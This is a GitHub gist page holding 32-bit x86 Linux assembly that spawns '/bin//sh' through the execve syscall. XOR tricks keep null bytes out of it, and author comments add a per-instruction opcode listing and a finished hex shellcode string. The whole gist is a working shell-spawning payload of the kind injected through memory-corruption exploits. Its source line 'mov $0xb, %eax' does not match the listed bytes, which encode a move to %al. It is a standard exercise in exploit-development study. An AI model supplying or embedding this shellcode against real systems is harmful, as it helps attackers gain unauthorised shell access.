Skip to content

Instantly share code, notes, and snippets.

@retpolanne

retpolanne/execve.s

Last active January 4, 2019 00:33
Show Gist options
  • Save retpolanne/7fd1f192e17c4823b1d4bdac2f03e36a to your computer and use it in GitHub Desktop.
Save retpolanne/7fd1f192e17c4823b1d4bdac2f03e36a to your computer and use it in GitHub Desktop.
Download ZIP
Xors to remove null bytes
Raw
execve.s
.global _start
.section .text
_start:
# execve syscall
xor %eax, %eax
push %eax # null byte for /bin/sh string
push $0x68732f2f # little endian //sh
push $0x6e69622f # little endian /bin
mov %esp, %ebx # ptr to /bin//sh string - on the stack
xor %ecx, %ecx # null ptr to argv
xor %edx, %edx # null ptr to envp
mov $0xb, %eax # syscall 11 - execve
int $0x80 # kernel mode
@retpolanne
Copy link
Author 

xor %eax, %eax                # 0x31 0xc0
push %eax                        # 0x50
push $0x68732f2f           # 0x68 0x2f 0x2f 0x73 0x68 
push $0x6e69622f          # 0x68 0x2f 0x62 0x69 0x6e
mov %esp, %ebx              # 0x89	0xe3
xor %ecx, %ecx                # 0x31 0xc9
xor %edx, %edx               # 0x31 0xd2 
mov $0xb, %eax              # 0xb0 0x0b   
int $0x80                         # 0xcd 0x80

@retpolanne
Copy link
Author

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment